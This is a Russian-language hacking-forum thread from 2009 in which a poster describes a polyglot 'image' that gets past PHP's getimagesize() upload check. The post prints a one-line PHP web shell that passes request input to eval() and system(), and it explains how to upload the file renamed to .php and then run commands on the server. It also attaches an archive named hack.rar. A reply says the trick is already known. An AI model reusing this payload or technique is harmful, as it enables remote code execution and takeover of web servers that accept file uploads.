HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Эксплойт getimagesize()
  #1  
Старый 25.03.2009, 14:31
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
С нами: 9798086

Репутация: 999


По умолчанию Эксплойт getimagesize()

Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать

PHP код:
<? eval(stripslashes($_GET)); system($_GET); ?>

Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.


Баг найден Eugen'ом с tem.dp.ua
Вложения
Тип файла: rar hack.rar (503 байт, 26 просмотров)
 
Ответить с цитированием

  #2  
Старый 25.03.2009, 14:50
D Mak
Участник форума
Регистрация: 23.06.2007
Сообщений: 188
С нами: 9938614

Репутация: 116
По умолчанию

вродь как баян уже
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите запустить эксплойт oficer Болталка 20 13.02.2009 21:17
В Сети появился эксплойт к критической уязвимости Windows [2-D] Мировые новости. Обсуждения. 3 20.01.2007 14:44
эксплойт для модема D-link 500t Qpet Защита ОС: вирусы, антивирусы, файрволы. 5 31.08.2006 11:41
В Сети появился новый эксплойт к уязвимости в ОС Windows dinar_007 Мировые новости. Обсуждения. 0 16.08.2006 22:27
В Сети может появиться опасный эксплойт для Windows DRON-ANARCHY Мировые новости. Обсуждения. 2 04.12.2005 19:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.